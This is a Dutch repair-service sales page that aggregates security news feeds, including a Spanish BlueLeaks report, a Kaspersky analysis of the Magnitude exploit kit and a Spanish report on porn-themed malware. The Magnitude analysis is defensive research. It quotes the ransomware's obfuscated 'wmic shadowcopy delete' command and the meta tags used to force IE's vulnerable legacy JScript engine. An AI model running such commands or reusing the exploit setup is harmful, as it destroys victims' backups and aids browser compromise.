Virus nieuws

Er zijn natuurlijk veel redenen dat je een virus of malware op je computer aan kunt treffen. Maar het grootste risico ben jezelf. Emails van bekende met een attachement, links naar onbekende websites; erger nog, een email van je bank. Allemaal risico volle emails die je gewoon niet moet openen. Onderstaand een lijst meet de top 10 van belangrijkste bedreigingen.

De beste bescherming?

Online backup van je gegevens, Crypto locker infecteerd ook je eigen backup. Bel nu voor de beste bescherming, of kijk hier voor onze tijdelijke aanbieding

Bel nu Onze landelijke website

Is het al te laat?

Neem snel contact op en we kunnen alles op afstand verwijderen, maken we gelijk je computer wat sneller. Bel 0623626623


De laatste virus meldingen overgenomen van Virusalert.nl

Trojan.Aybord (12)
Aybord is een trojan virus dat na installatie probeert om schadelijke bestanden te install ... Android.Lastacloud (0)
Lastacloud is een trojan virus dat zich richt op tablets en smartphones werkend op OS Andr ... Android.Fitikser (0)
Android.Fitikser is een zgh. trojaans paard dat zich richt op smartphone en tablets draaie ... Trojan.Beginto (8)
Beginto is een trojaans paard dat na installatie een backdoor installeert op het getroffen ... W32.Wabot Wabot is een internetworm die zich verspreidt via het IRC- chatprogramma. Het probeert om ... Trojan.Sakurel (16)
Sakurel is een zogeheten trojan. Na infectie installeert het een backdoor waarmee de virus ...


Voorbeeld van de werking van een virus of malware
BlueLeaks: hackers filtran 269 GB de archivos de miles de policías y agentes del orden
Author: Securelist
Link :
Email :
Description: Un grupo de hackers ha expuesto una base de datos que contiene correos electrónicos, memos e información personal que identifica a miles de policías y agentes del orden de Estados Unidos. La filtración se da en el contexto de las… Leer el artículo completo
Full content:

no-image

Un grupo de hackers ha expuesto una base de datos que contiene correos electrónicos, memos e información personal que identifica a miles de policías y agentes del orden de Estados Unidos. La filtración se da en el contexto de las protestas del movimiento Black Lives Matter por el asesinato de George Floyd, que ha conmocionado al país norteamericano y al mundo por haber evidenciado un crimen racial a manos de la policía de Minneapolis.

La filtración, denominada “Blue Leaks”, fue publicada el viernes por un colectivo de hackers que se hace llamar DDoSecrets. Según informó The Wired, los datos fueron obtenidos por miembros del grupo Anonymous.

Los documentos filtrados incluyen algunos mensajes que exponen estrategias de la policía y sus formas de operación. Entre ellos, se encuentran archivos que indican que las agencias han estado siguiendo de cerca las actividades en las redes sociales relacionadas con Black Lives Matter para detectar a los responsables de organizar las protestas. También se ha mostrado que las autoridades intercambian fotografías de los autos y ropa de sospechosos.

El volumen de información expuesta es enorme: son 269 GB de información que pertenece al FBI y a departamentos de policías de todo Estados Unidos. Los datos registran las actividades de las autoridades durante la última década.

Pero los datos también incluyen información personal de los policías, incluyendo datos bancarios y direcciones de correo electrónico. Por esa razón, se mantiene la alerta ante la posibilidad de que las personas afectadas sufran todavía más ataques cibernéticos que traten de explotar los datos expuestos para llevar a cabo, por ejemplo, ataques phishing.

El mes pasado, Anonymous publicó un video demostrando su apoyo al movimiento Black Lives Matter y amenazando con exponer otros crímenes realizados por la policía de Minneapolis. Esta filtración se realiza en ese contexto.

El investigador de seguridad Brian Krebs ha confirmado que los datos filtrados son legítimos. Además, la National Fusion Center Association –que coordina los datos que se comparten entre las autoridades federales y locales- publicó un tweet que valida la información expuesta: “los análisis preliminares de los datos que contiene esta filtración sugieren que Netsential, una compañía que ofrece servicios web a varias agencias legales, de seguridad y otras entidades en Estados Unidos, fue el origen de la filtración”.

Twitter ha desactivado una cuenta que DDoSecrets estaba utilizando para difundir la información filtrada, y también está bloqueando los enlaces que dirigen a la base de datos. Si un usuario intenta ingresar, recibe un mensaje que le advierte que el contenido podría ser peligroso.

Fuentes
BlueLeaks: Huge Leak Of Police Department Data Follows George Floyd Protests • Forbes
‘BlueLeaks’ Data Dump Exposes 269GB of Files From Hundreds of Police Departments • PC Magazine
Hackers just leaked sensitive files from over 200 police departments that are searchable by badge number • Business Insider

 

Contributor:
Copyright:
Category: News
Date: Thu, 25 Jun 2020 14:07:36 +0000
Local date: Thu, 25 Jun 2020 14:07:36 +0000
Latitude:
Longitude:
Language: es-ES
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: px
itemImageHeight: px
Magnitude exploit kit – evolution
Author: Boris Larin
Link :
Email :
Description: Exploit kits still play a role in today’s threat landscape and continue to evolve. For this blogpost I studied and analyzed the evolution of one of the most sophisticated exploit kits out there – Magnitude EK – for a whole year.
Full content:

Exploit kits are not as widespread as they used to be. In the past, they relied on the use of already patched vulnerabilities. Newer and more secure web browsers with automatic updates simply do not allow known vulnerabilities to be exploited. It was very different back in the heyday of Adobe Flash because it’s just a plugin for a web browser, meaning that even if the user has an up-to-date browser, there’s a non-zero chance that Adobe Flash may still be vulnerable to 1-day exploits. Now that Adobe Flash is about to reach its end-of-life date at the end of this year, it is disabled by default in all web browser and has pretty much been replaced with open standards such as HTML5, WebGL, WebAssembly. The decline of exploit kits can be linked to the decline of Adobe Flash, but exploit kits have not disappeared completely. They have adapted and switched to target users of Internet Explorer without the latest security updates installed.

Microsoft Edge replaced Internet Explorer as a default web browser with the release of Windows 10 in 2015, but Internet Explorer is still installed for backward compatibility on machines running Windows 10 and it has remained a default web browser for Windows 7/8/8.1. The switch to Microsoft Edge development also meant that Internet Explorer would no longer be actively developed and would only receive vulnerability patches without general security improvements. Still, somehow, Internet Explorer remains a relatively popular web browser. According to NetMarketShare, as of April 2020 Internet Explorer is used on 5.45% of desktop computers (for comparison, Firefox accounts for 7.25%, Safari 3.94%, Edge 7.76%). Despite the security of Internet Explorer being five years behind that of its modern counterparts, it supports a number of legacy script engines. CVE-2018-8174 is a vulnerability in a legacy VBScript engine that was originally discovered in the wild as an exploited zero-day. The majority of exploit kits quickly adopted it as their primary exploit.

Since the discovery of CVE-2018-8174 a few more vulnerabilities for Internet Explorer have been discovered as in-the-wild zero-days: CVE-2018-8653, CVE-2019-1367, CVE-2019-1429, and CVE-2020-0674. All of them exploited another legacy component of Internet Explorer – a JScript engine. It felt like it was just a matter of time until exploit kits adopted these new exploits.

Exploit kits still play a role in today’s threat landscape and continue to evolve. For this blogpost I studied and analyzed the evolution of one of the most sophisticated exploit kits out there – Magnitude EK – for a whole year.

This blogpost in a nutshell:

  • Magnitude EK continues to deliver ransomware to Asia Pacific (APAC) countries via malvertising
  • Study of the exploit kit’s activity over a period of 12 months shows that Magnitude EK is actively maintained and undergoes continuous development
  • In February this year Magnitude EK switched to an exploit for the more recent vulnerability CVE-2019-1367 in Internet Explorer (originally discovered as an exploited zero-day in the wild)
  • Magnitude EK uses a previously unknown elevation of privilege exploit for CVE-2018-8641 developed by a prolific exploit writer

Introduction

Magnitude EK is one of the longest-standing exploit kits. It was on offer in underground forums from 2013 and later became a private exploit kit. As well as a change of actors, the exploit kit has switched its focus to deliver ransomware to users from specific Asia Pacific (APAC) countries via malvertising.

Active attacks by Magnitude EK in 2019 according to Kaspersky Security Network (KSN) (download)

Active attacks by Magnitude EK in 2020 according to Kaspersky Security Network (KSN) (download)

Our statistic shows that this campaign continues to target APAC countries to this day and during the year in question Magnitude EK always used its own ransomware as a final payload.

Infection vector

Like the majority of exploit kits out there, in 2019 Magnitude EK used CVE-2018-8174. However, the attackers behind Magnitude EK were one of the first to adopt the much newer vulnerability CVE-2019-1367 and they have been using it as their primary exploit since February 11, 2020. As was the case with CVE-2018-8174, they didn’t develop their own exploit for CVE-2019-1367, instead reusing the original zero-day and modifying it with their own shellcode and obfuscation.

CVE-2019-1367 is a Use-After-Free vulnerability due to a garbage collector not tracking a value that was not rooted in the legacy JavaScript engine jscript.dll. By default, Internet Explorer 11 uses Jscript9.dll, but it’s still possible to execute the script using the legacy engine by enabling compatibility mode with Internet Explorer 7/8. This can be done with the following script attributes:

<meta http-equiv="x-ua-compatible" content="IE=EmulateIE8" />
        <script language="JScript.Compact">…</script>

        <meta http-equiv="x-ua-compatible" content="IE=EmulateIE8" />
        <script language="JScript.Encode">…</script>

The original exploit uses JScript.Compact, a special profile defined for embedded devices. But JScript.Encode is much more interesting because it was developed by Microsoft to protect scripts and prevent source code from being copied. This script attribute can execute scripts encoded with Microsoft Script Encoder (screnc.exe) and it also disables script debugging. Basically, it’s a DRM for JavaScript. Magnitude EK changed from its original exploit to take advantage of this feature.

Exploit packed with JScript.Encode technique

Unpacked exploit. Shellcode, names and some strings are obfuscated

Shellcode

Their shellcodes piqued my interest. They use a huge number of different shellcode encoders, from the classical Metasploit shikata_ga_nai encoder and DotNetToJScript to a variety of custom encoders and stagers.

It was also impossible not to notice the changes happening to their main shellcode responsible for launching the ransomware payload. The attackers are fine-tuning their arsenal on a regular basis.

Magnitude EK has existed since at least 2013, but below you can see just the changes to payload/shellcode that occurred over the period of one year (June 2019 to June 2020). During this period we observed attacks happening almost every day.

Timeline of shellcode/payload changes

Date Description
June 2019 Shellcode downloads a payload that’s decrypted with a custom xor-based algorithm. All strings are assembled on stack and to change payload the URL shellcode needs to be recompiled. The payload is a PE module. The module export function name is hardcoded to “GrfeFVGRe”. The payload is executed in an Internet Explorer process. It contains an elevation of privilege exploit with support for x86 and x64 versions of Windows and an encrypted ransomware payload. After elevation of privilege it injects the ransomware payload to other processes, spawns the wuapp.exe process and injects there as well. If process creation fails, it also runs the ransomware from the current process.
July 20, 2019 Payload module export function name is auto-generated.
November 11, 2019 Shellcode tries to inject the payload to other processes. If API function Process32First fails, it spawns the process wuapp.exe from Windows directory and injects the payload there. The injection method is WriteProcessMemory + CreateRemoteThread.

The payload is ransomware without elevation of privilege. The payload module export function name is hardcoded again, but now to “lssrcdxhg”.

November 20, 2019 Looks like they messed up the folder with shellcodes; in some attacks they use a shellcode from June, and later the same day they start to use their November shellcode with the new hardcoded export name “by5eftgdbfgsq323”.
November 23, 2019 They start to use the elevation of privilege exploit again, but now they also check the integrity level of the process. If it’s a low integrity process, then they execute the payload with the exploit in the current process; if that’s not the case, then it’s injected into other processes. The process is no longer created from shellcode, but it’s still created from the payload. The payload module export name is hardcoded to “gv65eytervsawer2”.
January 17, 2020 It looks like the attackers had a short holiday at the beginning of the year. The shellcode remains the same, but the payload module export function name is hardcoded to “i4eg65tgq3f4”. The payload changed a bit. The name of the created process is now assembled on stack. The name of the process also changed – it no longer spawns a wuapp.exe, but instead launches the calculator calc.exe and injects the ransomware payload there.
January 27, 2020 The payload is no longer a PE module but plain shellcode. The payload consists of ransomware without elevation of privilege.
February 4, 2020 The payload is a PE module again, but once again the export name is auto-generated.
February 10, 2020 The shellcode comes with two URLs for different payloads. The shellcode checks the integrity level and depending on process integrity level, it executes the elevation of privilege payload or uses the ransomware payload straightaway. All strings and function imports in the exploit are now obfuscated. The payload does not spawn a new process, and only injects to others.
February 11, 2020 Magnitude EK starts using CVE-2019-1367 as its primary exploit. The attackers use the shellcode from January 27, 2020, but they have modified it to check for the name of a particular process. If the process exists, they don’t execute the payload from Internet Explorer. The process name is “ASDSvc” (AhnLab, Inc.).
February 17, 2020 The attackers switch to the shellcode from February 10, 2020, but the payload module export function name is hardcoded to “xs324qsawezzse”.
February 28, 2020 Shellcode encryption is removed. The payload module export function name is hardcoded to “sawd6vf3y5”.
March 1, 2020 Strings are no longer stored on stack.
March 6, 2020 Back to the shellcode from February 17, 2020.
March 10, 2020 The attackers add some functionality implemented after February 17, 2020: payload encryption is removed and strings are no longer stored on stack. The payload module export function name is still hardcoded to “xs324qsawezzse”.
March 16, 2020 Functionality added so as not to inject into a particular process (explorer.exe). The injection method is also changed to NtCreateSection + NtMapViewOfSection + RtlCreateUserThread.
April 2, 2020 The attackers add some functionality similar to that used in November 2019. They check the integrity level of a process and if it’s a low integrity process, they execute the payload from the current process. If that’s not the case, they inject it to other processes (other than explorer.exe) and at the end create a new process and inject it there as well. The created processes are C:\Program Files\Windows Media Player\wmlaunch.exe or C:\Program Files (x86)\Windows Media Player\wmlaunch.exe depending on whether it’s a WOW64 process or not.
April 4, 2020 Shellcode updated to use a new injection technique: NtQueueApcThread. The shellcode also comes with a URL for a ransomware payload without elevation of privilege. The shellcode checks the integrity level and if it’s a low integrity process, the shellcode calls ExitProcess(). Use of the hardcoded export name “xs324qsawezzse” is also stopped.
April 7, 2020 Back to the shellcode from April 2, 2020.
May 5, 2020 Previously the attackers adjusted their injection method, but now they revert back to injection via the WriteProcessMemory + CreateRemoteThread technique.
May 6, 2020 They continue to make changes to the code injection method. From now on they use NtCreateThreadEx.

 

Elevation of privilege exploit

The elevation of privilege exploit used by Magnitude EK is quite interesting. When I saw it for the first time, I wasn’t able to recognize this particular exploit. It exploited a vulnerability in the win32k kernel driver and closer analysis revealed that this particular vulnerability was fixed in December 2018. According to Microsoft, only two win32k-related elevation of privilege vulnerabilities were fixed that month – CVE-2018-8639 and CVE-2018-8641. Microsoft previously shared more information with us about CVE-2018-8639, so we can say with some certainty that the encountered exploit uses vulnerability CVE-2018-8641. The exploit has huge code similarities with another zero-day that we had found previously – CVE-2019-0859. Based on these similarities, we attribute this exploit to the prolific exploit writer known as “Volodya”, “Volodimir” or “BuggiCorp”. Volodya is famous for selling zero-day exploits to both APT groups and criminals. In the past, Volodya advertised his services at exploit(dot)in, the same underground forum where Magnitude EK was once advertised. We don’t currently know if the exploit for CVE-2018-8641 was initially used as a zero-day exploit or it was developed as a 1-day exploit through patch diffing. It’s also important to note that a public exploit for CVE-2018-8641 also exists, but it’s incorrectly designated to CVE-2018-8639 and it exploits the vulnerability in another fashion, meaning there are two completely different exploits for the same vulnerability.

Ransomware

Magnitude EK uses its own ransomware as its final payload. The ransomware comes with a temporary encryption key and list of domain names and the attackers change them frequently. Files are encrypted with the use of Microsoft CryptoAPI and the attackers use Microsoft Enhanced RSA and AES Cryptographic Provider (PROV_RSA_AES). The initialization vector (IV) is generated pseudo randomly for each file and a 0x100 byte long blob with encrypted IV is appended to the end of the file. The ransomware doesn’t encrypt the files located in common folders such as documents and settings, appdata, local settings, sample music, tor browser, etc. Before encryption, the extensions of files are checked against a hash table of allowed file extensions that contains 715 entries. A ransom note is left in each folder with encrypted files and at the end a notepad.exe process is created to display the ransom note. To hide the origin of the executed process, the ransomware uses one of two techniques: “wmic process call create” or “pcalua.exe –a … -c …”. After encryption the ransomware also attempts to delete backups of the files with the “wmic shadowcopy delete” command that is executed with a UAC-bypass.

Example of Magnitude EK ransom note

The core of the ransomware did not undergo many changes throughout the year. If we compare old samples with more recent versions, there are only a few notable changes:

  • In older versions, immediately at launch the payload gets the default UI language of the operating system using the GetSystemDefaultUILanguage API function and compares the returned value against a couple of hardcoded language IDs (e.g. zh-HK – Hong Kong S.A.R., zh-MO – Macao S.A.R., zh-CN – People’s Republic of China, zh-SG – Singapore, zh-TW – Taiwan, ko-KR – Korea, ms-BN – Brunei Darussalam, ms-MY – Malaysia). If the language ID doesn’t match, then ExitProcess() will be executed. In newer versions, the check for the language ID was removed.
  • In older versions, the ransomware deletes file backups with the command “cmd.exe /c “%SystemRoot%\system32\wbem\wmic shadowcopy delete” via UAC-bypass in eventvwr.exe. In the newer version, the command is obfuscated with caret character insertion “cmd.exe /c “%SystemRoot%\system32\wbem\wmic ^s^h^a^d^o^w^c^o^p^y^ ^d^e^l^e^t^e” and executed via UAC-bypass in CompMgmtLauncher.exe.

Conclusions

The total volume of attacks performed by exploit kits has decreased, but they still exist, are still active, and still pose a threat, and therefore need to be treated seriously. Magnitude is not the only active exploit kit and we see other exploit kits that are also switching to newer exploits for Internet Explorer. We recommend installing security updates, migrating to a newer operating system (make sure you stay up to date with Windows 10 builds) and also not using Internet Explorer as your web browser. Throughout the entire Magnitude EK campaign we have detected the use of Internet Explorer exploits with the verdict PDM:Exploit.Win32.Generic.

 

Contributor:
Copyright:
Category: Featured
Date: Wed, 24 Jun 2020 10:00:16 +0000
Local date: Wed, 24 Jun 2020 10:00:16 +0000
Latitude:
Longitude:
Language: en-US
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1200 px
itemImageHeight: 776 px
Contenidos explícitos y ciberamenazas: Informe de 2019
Author: Kaspersky
Link :
Email :
Description: En el último par de años hemos escrito varios artículos sobre cómo se usaron los contenidos para adultos para propagar malware y abusar de la privacidad de los usuarios. Se trata de una tendencia que no está en riesgo de desaparecer, especialmente bajo las circunstancias actuales.
Full content:

“Quédate en casa” es el nuevo lema para 2020 y ha llevado a muchos cambios en nuestra vida diaria, especialmente en cuanto a nuestro consumo de contenidos digitales. El confinamiento ha hecho que los usuarios opten por buscar entretenimiento en línea, con lo que las actividades maliciosas relacionadas también han experimentado un aumento. En el último par de años hemos escrito varios artículos sobre cómo se usaron los contenidos para adultos para propagar malware y abusar de la privacidad de los usuarios. Se trata de una tendencia que no está en riesgo de desaparecer, especialmente bajo las circunstancias actuales. Si bien muchas plataformas de pornografía están disfrutando de la afluencia de nuevos usuarios y proveen servicios legítimos y seguros, los riesgos de seguridad se mantienen, si es que no han aumentado.

Una de las principales preocupaciones relacionadas con los contenidos para adultos son los riesgos que representan para la privacidad. Cada año que pasa, la privacidad es un recurso cada vez más escaso, y los dispositivos móviles son los nuevos objetivos favoritos de las infecciones. Con las fugas de datos que son cada vez más frecuentes, el abuso de la privacidad y su valor han vuelto al debate, y es ahora un motivo de preocupación para muchos usuarios que en el pasado podrían haberle restado importancia. La nueva realidad muestra que esta tendencia es real y bastante tangible. Hoy en día es ampliamente aceptado el acuerdo social que implica el intercambio de datos personales por servicios. Sin embargo, es algo completamente diferente si los datos que el usuario no tenía la intención de compartir terminan siendo expuestos. Una situación de esta naturaleza puede traer consecuencias devastadoras e incluso poner en riesgo la propia vida. Nuestras preferencias sexuales y nuestra vida sexual probablemente encabecen la lista de cosas que todos nosotros, como sociedad, preferimos mantener en privado, con un 28% de usuarios que creen que las búsquedas relacionadas con sexo deben mantenerse en el anonimato. Sin embargo, los ciberdelincuentes parecen tener otra opinión.

Las últimas noticias sobre fugas de datos relacionados con pornografía confirman esta tendencia. La fuga de contenidos para adultos que sufrió OnlyFans, creados por trabajadoras sexuales, que no solo son una fuente de ingresos para ellas, sino que también es información que no eligieron compartir públicamente, es otro incidente notable. Este y otros ejemplos muestran cómo las fugas de información violan las vidas personales, por qué son dañinas e incluso peligrosas. La fuga de datos personales de más de 1195 millones de usuarios desde un sitio de pornografía Hentai es otro ejemplo de cómo se abusó de datos que no estaban destinados a ser de conocimiento público, que puso en peligro a numerosos usuarios. Estos incidentes suceden con cada vez mayor frecuencia, y las organizaciones que administran estos datos no pueden deslindarse de su responsabilidad: con gran frecuencia, los datos de los usuarios no están cifrados ni bajo la debida protección, a pesar de ser un blanco tentador para los ciberdelincuentes que buscan lucrar con ellos.

Pero, por supuesto, hay mucho más debajo de la superficie. Para conocer qué amenazas acechan a los consumidores de contenidos para adultos, llevamos a cabo la siguiente investigación.

Metodología y principales resultados

Para comprender los riesgos que pueden estar asociados con los contenidos pornográficos en línea, investigamos diferentes tipos de amenazas. Evaluamos malware para PCs y dispositivos móviles disfrazado de contenidos para adultos para ver qué tipo de archivos peligrosos podrían estar descargando los usuarios. También hicimos pruebas para ver en qué medida los ciberdelincuentes utilizan contenidos violentos y aplicaciones de citas “para adultos” como camuflaje para distribuir sus programas maliciosos. Analizamos el aspecto de la privacidad del consumo de contenidos para adultos y los peligros asociados con las violaciones a la privacidad, desde el malware dedicado a la caza de credenciales, sitios web pornográficos, hasta qué tipo de contenidos relacionados con sexo se filtran a la web oscura. También estudiamos el phishing y spam relacionados con pornografía y citas sexuales para ver qué tipo de contenidos deberían preocupar a los usuarios. Mediante Kaspersky Security Network (KSN, una infraestructura dedicada al procesamiento de flujos de datos relacionados con la ciberseguridad, y que cuenta con el aporte de millones de participantes voluntarios de todo el mundo) medimos el número y el tipo de amenazas con que los usuarios se toparon en los últimos años.

Además, nos sumergimos en los mercados clandestinos en línea para averiguar qué tipo de datos personales vinculados con sexo estaban a la venta y qué tipo de estafas se discutían en las fraternidades de ciberdelincuentes.

Como resultado, descubrimos lo siguiente:

  • Las amenazas para dispositivos móviles están en alza, mientras que el malware y las aplicaciones potencialmente no deseadas para PC han ido perdiendo su atractivo para los ciberdelincuentes. La cantidad de usuarios móviles atacados aumentó más del doble, de 19 699 en 2018 a 42 973 en 2019. Por el contrario, hubo una caída en las amenazas basadas en PC, de 135 780 usuarios atacados en 2018 a 106 928 en 2019.
  • A los ciberdelincuentes les interesa sobre todo la flexibilidad del malware que distribuyen: casi dos de cada cinco usuarios atacados por amenazas para PC relacionadas con pornografía han sido atacados por troyanos descargadores (39,6%), que permiten la instalación posterior de otros tipos de programas maliciosos.
  • La cantidad de usuarios atacados por malware diseñado para recopilar credenciales de acceso a sitios web de pornografía ha disminuido, mientras que el número de ataques con malware sigue aumentando, del 37% desde 2018 a 2019, llegó a un total de 1 169 153 en 2019. Esto revela la persistencia de las redes zombi, o botnets, en sus ataques contra los mismos usuarios, un escenario completamente diferente al de 2018.
  • La privacidad se ha convertido en una gran preocupación para los usuarios de contenidos para adultos. Cosas como la filtración de imágenes personales y el robo de suscripciones premium para sitios de pornografía siguen teniendo una alta demanda, y el tema del sexo sigue siendo utilizado por los ciberdelincuentes como una forma fácil de ganar dinero.

Amenazas para PC

El malware se propaga por la red, disfrazado de archivos o actualizaciones para software, y se distribuye a través de numerosos sitios web en todo el espacio digital. El sistema de distribución es vital para el éxito del malware. En el pasado, era muy popular la técnica conocida como ‘black SEO‘, que permitía que sitios maliciosos aparecieran entre los primeros resultados de búsqueda, pero ahora los motores de búsqueda han tomado medidas efectivas para impedirlo, y los ciberdelincuentes han recurrido a otros canales.

Los programas maliciosos suelen distribuirse mediante redes afiliadas de sitios web para compartir contenidos pornográficos (vimos un caso similar, aunque sobre un tema menos carnal, en uno de nuestros últimos informes sobre el troyano Shlayer). Más aun, los ciberdelincuentes pueden crear estos sitios web usando sitios web de plantillas pornográficas: estos servicios están disponibles de forma gratuita, y su objetivo principal es vender publicidad para crear una fuente de ingresos para los propietarios. Teniendo el control sobre el contenido de un sitio web desde donde se distribuye malware de extorsión sexual, los ciberdelincuentes pueden limitar sus víctimas a su público objetivo.

Los sitios web legítimos también pueden convertirse en fuente de amenazas, a menudo sin notarlo, con enlaces maliciosos plantados en la sección de comentarios o a través del uso de programas publicitarios maliciosos, o malvertising. Si bien los sitios web de pornografía más populares están bien protegidos y muy raras veces son fuente de malware, no pasa lo mismo con muchos otros. En general, esto muestra que la descarga de cualquier elemento desde la web siempre conlleva riesgos que el usuario debe sopesar.

Etiquetas porno = etiquetas malware

Casi cualquier contenido que tenga demanda puede ser usado como carnada por los ciberdelincuentes, y esto es particularmente cierto para el entretenimiento en línea. Nuestra anterior investigación demostró que la mejor manera de hacer llegar los archivos infectados a los dispositivos de las víctimas es camuflarlos como algo que están buscando. En el caso de los contenidos para adultos, el uso de etiquetas porno ha resultado ser un método popular. El término ‘etiqueta porno’, o ‘porn tag’, se utiliza para clasificar los videos pornográficos por géneros. Cada sitio web de pornografía tiene una página dedicada a las etiquetas porno, y la cantidad de videos disponibles con estas etiquetas reflejan la popularidad de sus contenidos.

Anteriormente, para determinar la prevalencia de las amenazas que se camufla como contenido pornográfico, analizamos las 100 etiquetas más populares. El análisis reveló una correlación entre la popularidad de las etiquetas porno y los archivos infectados disfrazados como contenidos para adultos: gran parte de los programas maliciosos se distribuyen camuflados o usando algunas de las etiquetas más comunes. Esto significa que no es necesario analizar las 100 etiquetas para comprender el panorama de las amenazas. Este año nos limitamos a analizar las 10 etiquetas más populares y las comparamos con nuestra base de datos de amenazas y con la telemetría de Kaspersky. Seleccionamos las etiquetas más populares en base a la información de los tres sitios web de pornografía más visitados, y elegimos aquellos con la mayor cantidad de video subidos.

La comparación entre los resultados de 2018 y 2019 mostró que disminuyó la cantidad de usuarios atacados por esta amenaza: de 135 780 a 106 928, así como el número de ataques: de 148 419 a 108 973. Sin embargo, esto no es señal de que la amenaza haya perdido importancia. Los resultados mostraron una amplia variedad de archivos infectados tanto por malware como por amenazas del tipo not-a-virus, entre ellas herramientas peligrosas, adware y descargadores. De hecho, en 2019 se propagaron 473 familias de malware y amenazas del tipo not-a-virus pertenecientes a 32 variedades, un poco menos que en 2018: 527 familias y 30 variedades.

Archivos únicos propagados, cantidad de usuarios afectados y número de detecciones de archivos maliciosos camuflados como contenido para adultos para PC en 2018 y 2019. Fuente: Kaspersky Security Network (descargar)

Observando las amenazas que atacaron a la mayoría de los usuarios, vemos un incremento en el porcentaje de los troyanos descargadores: un tipo de programa malicioso que una vez instalado en el dispositivo de la víctima, es capaz de descargar cualquier otro programa. Dos de cada tres usuarios (39%) que descargaron malware disfrazado como contenidos pornográficos fueron atacados por esta amenaza. Los troyanos descargadores permiten que los atacantes adapten su estrategia e infecten a sus víctimas con cualquier programa malicioso que consideren más efectivo y rentable.

Una vez lanzado, Trojan-Downloader.Win32.Autoit.vzu distrae al usuario con el video deseado mientras descarga y ejecuta, sin que el usuario se entere, otro archivo malicioso en el dispositivo infectado

Otros tipos de troyanos también son atractivos para los ciberdelincuentes, seguidos por amenazas no virales, como descargadores y adware. Es importante notar que los troyanos secuestradores y las puertas traseras, relativamente peligrosos, siguen en el TOP 10. Estas amenazas han ido disminuyendo desde hace tiempo, pero vemos que no se han vuelto obsoletas. En particular, es probable que los programas secuestradores, o ransomware, que propagan archivos con contenidos pornográficos se concentren en usuarios de contenidos ilícitos que no desean que nadie se entere.

TOP 10 de tipos de amenazas camufladas como categorías de pornografía, por el número de usuarios atacados en 2018 y 2019. Fuente: Kaspersky Security Network (descargar)

Una mirada más atenta a los nombres de detección más comunes revela que la diferencia entre las amenazas más importantes en 2018 y 2019 es mínima. Los descargadores se popularizaron por su ya mencionada flexibilidad: seis de las 10 principales detecciones en 2019. El adware y los descargadores no virales también han seguido propagándose.

Top 10 de nombres de detección para amenazas disfrazadas como contenidos pornográficos, por el número de usuarios de PC atacados, en 2018 y 2019. Fuente: Kaspersky Security Network (descargar)

Cazadores de credenciales

En plena era digital, virtualmente cualquier persona corre el riesgo de perder su información personal, y en particular, sus valiosas credenciales. Para automatizar la recopilación de estos datos, los ciberdelincuentes utilizan los cazadores de credenciales: un tipo de malware cuyo propósito es robar los datos de inicio de sesión para varios sitios y servicios. Rastreamos este tipo de malware utilizando nuestra tecnología de rastreo de redes zombi, que permite el monitoreo de estas redes activas, recopila inteligencia y previene contra amenazas emergentes.

Una vez instalado en una PC, este malware puede monitorear qué páginas web se abren, o puede crear otras falsas donde le pide al usuario que introduzca su inicio de sesión y su contraseña. Esta técnica es muy utilizada para robar datos bancarios, aunque los sitios de pornografía tampoco le son inmunes.

La dinámica de las actividades de las botnets en relación a los contenidos pornográficos durante los tres últimos años muestra una tendencia curiosa: habiendo captado la atención de varios grupos en 2018, comenzó a declinar en 2019, aunque el número total de ataques siguió creciendo. Esto se refleja tanto en una significativa disminución de la cantidad de usuarios afectados por los robos de sus cuentas en sitios pornográficos mediante redes zombi en 2019, así como una baja en la variedad de redes zombi utilizadas para cazar credenciales. Por ejemplo, en 2017 solo tres familias cazaban cuentas relacionadas con pornografía; en 2018, este número subió a cinco familias, mientras que en 2019 se redujo a una sola, llamada Ramnit. Esto confirma además que en algún momento en 2018 más actores se involucraron en el robo de contraseñas para sitios de pornografía, pero por alguna razón este interés decayó en 2019.

Número de usuarios atacados y detecciones de ataques desde redes zombi que cazan cuentas premium de pornografía, 2017-2019. Fuente: Kaspersky Security Network (descargar)

La cantidad de sitios afectados en 2019 fue la misma que en el año anterior. Los sitios web pornhub.com y xvideos.com, ambos entre los tres sitios de pornografía más visitados según las estadísticas publicadas en 2020 de similarweb.com, fueron atacados en 2019. Puesto que los ataques se concentraron en una sola familia, el número de usuarios afectados también disminuyó en un 65%: de 110 000 en 2018, a 38 846 en 2019. Sin embargo, la cantidad de ataques siguió creciendo en un 37% entre 2018 y 2019, llegando a 1 169 153, lo que muestra la persistencia de las redes zombi en sus ataques contra los mismos usuarios.

En general, podemos afirmar que, aunque menos ciberdelincuentes se interesaron en robar credenciales desde sitios de pornografía, la amenaza sigue vigente y se concentra solo en los sitios más visitados, lo que significa que los ciberdelincuentes comprenden muy bien el potencial de la demanda de credenciales en el mercado negro.

Amenazas móviles

Para conocer más las amenazas móviles relacionadas con contenidos ilícitos, revisamos todos los archivos camuflados como videos porno o paquetes de instalación de contenidos para adultos para Android en 2018 y 2019. Si bien seguimos usando etiquetas porno como criterio de filtrado, tal como lo hicimos para el análisis de amenazas basadas en PC, la metodología fue levemente distinta. Cotejamos 200 etiquetas porno populares con nuestra base de datos de amenazas para comprender mejor las amenazas móviles relacionadas con pornografía. El análisis arrojó resultados para 105 etiquetas en 2018 y para 99 en 2019, lo que demuestra que no todo lo porno atrae a los ciberdelincuentes. Aunque se usaron menos etiquetas para la propagación de archivos maliciosos disfrazados como pornografía, en 2019 la cantidad de usuarios atacados por malware relacionado con pornografía y amenazas del tipo not-a-virus se duplicó, alcanzado los 42 973, en comparación a los 19 699 en 2018.

También cotejamos por separado 40 etiquetas porno ‘violentas’ con la misma base de datos de detecciones en dispositivos Android. La categoría violenta incluía una variedad de etiquetas asociadas con violencia sexual contra otra persona. La hipótesis fue que más etiquetas prono inusuales pueden demostrar un desmesurado alto nivel de actividades maliciosas. Sin embargo, los resultados mostraron que estas etiquetas eran muy poco utilizadas para propagar malware, con 270 usuarios atacados en 2018, y 133 en 2019.

